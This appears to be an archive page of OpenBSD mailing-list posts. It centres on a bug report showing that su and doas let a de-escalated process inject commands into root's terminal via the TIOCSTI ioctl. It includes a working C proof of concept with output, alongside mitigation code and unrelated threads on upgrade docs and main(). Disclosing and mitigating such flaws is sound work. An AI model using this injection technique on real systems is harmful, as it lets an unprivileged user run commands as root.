Re: Unexpected behavior in su/doas

2016-10-03 Thread Simon Ruderich
On Sat, Oct 01, 2016 at 03:54:40PM -0600, Theo de Raadt wrote:
> De-escalation using these "sudo" or "doas" like tools on a tty is
> somewhat unsafe - it has always been unsafe - because tty's have
> capabilities.

Until looking into this issue I was totally unaware of the
possible implications (even though they are obvious when you
start thinking about it) and I guess I'm not alone. I think we
should document the fact that using those tools for de-escalation
is not safe in the su/doas/sudo man pages.

> If you wish to be safer, do these operations without retaining access
> to a tty.

Are there tools available for this task?

I could use SSH, but that only works for unlocked accounts with a
password/ssh-key.

> Escalation on the other hand (user -> root) is different, because then
> it is clear you want to do more / everything.  But de-escalation is a
> joke.
>
> This is just one mechanism on tty, there are others.  On other
> descriptors there are other abilities.

sudo provides the use_pty option (sadly not by default) which
spawns a new session with a new controlling TTY and then forwards
the input to the original tty (similar to what SSH does - just
without the network). This way the unprivileged process never has
any access to the privileged terminal which prevents this attack.

Would it be useful to add a similar feature (per default) to
su/doas or are there downsides or other possible attacks with
this approach?

Regards
Simon
-- 
+ privacy is necessary
+ using gnupg http://gnupg.org
+ public key id: 0x92FEFDB7E44C32F9


signature.asc
Description: PGP signature
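The mechanism behind Theo's advice to do these operations without retaining access to a tty, as an added example in C (not code from the thread, nor from su, doas or sudo): the de-escalated command is started in its own session with setsid() and with stdin from /dev/null, so the open("/dev/tty") in the test binary fails and the privileged terminal's input queue is out of reach. The su command line shown in the comment is an assumed example.

```c
#include <fcntl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Exit code of pid, 128+signal if it was killed, -1 on error. */
static int wait_status(pid_t pid)
{
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    if (WIFEXITED(st)) return WEXITSTATUS(st);
    return WIFSIGNALED(st) ? 128 + WTERMSIG(st) : -1;
}

/* Fork a child, detach it from the controlling terminal with setsid()
 * and let it try the same open("/dev/tty") the test binary performs.
 * Returns 1 if the detached child could still open a tty, 0 if the open
 * failed (no controlling terminal, ENXIO), -1 on error. */
int detached_child_reaches_tty(void)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setsid() < 0) _exit(2);
        int fd = open("/dev/tty", O_RDONLY);
        _exit(fd >= 0 ? 1 : 0);
    }
    int rc = wait_status(pid);
    return (rc == 0 || rc == 1) ? rc : -1;
}

/* Run argv, e.g. {"su", "builder", "-c", "/tmp/a.out", NULL} (assumed
 * example), in a new session with stdin from /dev/null: the command then
 * has neither a controlling terminal nor a readable tty descriptor for
 * TIOCSTI, while stdout/stderr stay inherited so its output is visible.
 * Returns the command's exit status as wait_status() reports it. */
int run_without_tty(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setsid() < 0) _exit(127);
        int devnull = open("/dev/null", O_RDONLY);
        if (devnull < 0 || dup2(devnull, STDIN_FILENO) < 0) _exit(127);
        close(devnull);
        execvp(argv[0], argv);
        _exit(127);   /* exec failed */
    }
    return wait_status(pid);
}
```

This is the minimal, non-interactive variant of what sudo's use_pty does; use_pty keeps interactive input by relaying it through a fresh pseudo-terminal instead of cutting it off.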


Unexpected behavior in su/doas

2016-10-01 Thread Simon Ruderich
Hello,

I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches)
which seems to allow running commands as the original user when
using su and doas interactively because the controlling terminal
is the same.

The following binary is used to test this and compiled as
/tmp/a.out:

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

/* Each byte is pushed into the controlling terminal's input queue with
 * TIOCSTI, as if it had been typed there. Because su/doas leave the
 * child on the same controlling tty, the privileged shell reads these
 * bytes as its next command once the child exits. */
char s[] = "echo Payload as $(whoami)\n";

int main(void) {
    printf("uid: %d\n", (int)getuid());

    char *c = s;
    int tty = open("/dev/tty", O_RDONLY);

    if (tty < 0)
        return 1; /* no controlling terminal to write to */

    do {
        ioctl(tty, TIOCSTI, c);
        c++;
    } while (*c);

    return 0;
}

Now running su builder -c /tmp/a.out (where builder is just a
normal user with a shell) results in:

# su builder -c /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Something similar happens with doas and the following config:

# cat /etc/doas.conf
permit nopass root as builder

# doas -u builder /tmp/a.out
uid: 1000
echo Payload as $(whoami)
# echo Payload as $(whoami)
Payload as root

Is this behavior expected and if so, how do I run commands from
root as an untrusted user? It's not mentioned in the man page
that using su/doas as root might allow other users to run code as
root.

Similar behavior is also mentioned in an old (and unfixed) Debian
bug [1].

Regards
Simon

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628843


Re: [PATCH] www: mention /usr/src in upgrade notes

2016-09-19 Thread Simon Ruderich
On Mon, Sep 19, 2016 at 07:25:08PM -0700, Philip Guenther wrote:
> Listing what something *doesn't* do is generally a bad plan, because
> the list has no end, so where to draw the line becomes a matter of
> opinion.  Better to list what the installer does update and say that's
> the complete list, and then perhaps "Anything else previously
> installed will need to be updated separately."

Sounds fine to me.

Regards
Simon


Re: [PATCH] www: mention /usr/src in upgrade notes

2016-09-19 Thread Simon Ruderich
On Mon, Sep 19, 2016 at 03:00:40AM +0200, Theo Buehler wrote:
> On Mon, Sep 19, 2016 at 01:59:20AM +0200, Simon Ruderich wrote:
>> I'm a relatively new OpenBSD user and just updated my system from
>> 5.9 to 6.0 but forgot to update the files in /usr/src. Thus when
>> I applied the latest patches (001-006) I actually built an old
>> 5.9 kernel which failed to boot. The following patch mentions
>> /usr/src in the upgrade notes.
>
> Thanks a lot for taking the time and submitting a patch. I will need to
> think about this a little. I will probably end up adding a link to
> errata.html since that is a more glaring omission on that page.

Hello,

I saw the addition of the errata and stable links. I think that's
an improvement, thanks.

However I still would like to see a quick note telling the user
that they should remember to update all source-based data because
the installer won't do it for them. Maybe something like "The
installer doesn't automatically update source files, for example
in /usr/src".

Regards
Simon


[PATCH] www: mention /usr/src in upgrade notes

2016-09-18 Thread Simon Ruderich
Hello,

I'm a relatively new OpenBSD user and just updated my system from
5.9 to 6.0 but forgot to update the files in /usr/src. Thus when
I applied the latest patches (001-006) I actually built an old
5.9 kernel which failed to boot. The following patch mentions
/usr/src in the upgrade notes.

Regards
Simon

Index: upgrade60.html
===
RCS file: /cvs/www/faq/upgrade60.html,v
retrieving revision 1.11
diff -u -r1.11 upgrade60.html
--- upgrade60.html  14 Sep 2016 15:53:09 -  1.11
+++ upgrade60.html  18 Sep 2016 23:55:55 -
@@ -41,7 +41,8 @@
 boot loader to boot this kernel.
 Once this kernel is booted, choose the (U)pgrade option and follow the
 prompts.
-Finish up by upgrading the packages: pkg_add -u.
+Finish up by upgrading the packages: pkg_add -u. Don't forget
+to update /usr/src if you're using it to build from source.
 
 
 Alternatively, you can use the manual upgrade 
process.
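Review bot: the added `+` lines state one thing the installer does not do ("Don't forget to update /usr/src if you're using it to build from source"), and a list of omissions has no natural end, as the reply in this thread points out; consider instead saying which things the installer does update and closing with "Anything else previously installed will need to be updated separately." Either way, a short reason would help readers who build from source: applying errata patches against the previous release's /usr/src produces a kernel of that release, which is what motivated this patch.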



Re: does true.c need command line arguments?

2016-07-05 Thread Simon Ruderich
On Mon, Jul 04, 2016 at 03:04:32PM -0600, Theo de Raadt wrote:
> Because main() is specified to take those arguments.

For what it's worth, the C standard [1] specifies both versions:
int main(void) and int main(int argc, char *argv[]).

Regards
Simon

[1]: C11 draft, section 5.1.2.2.1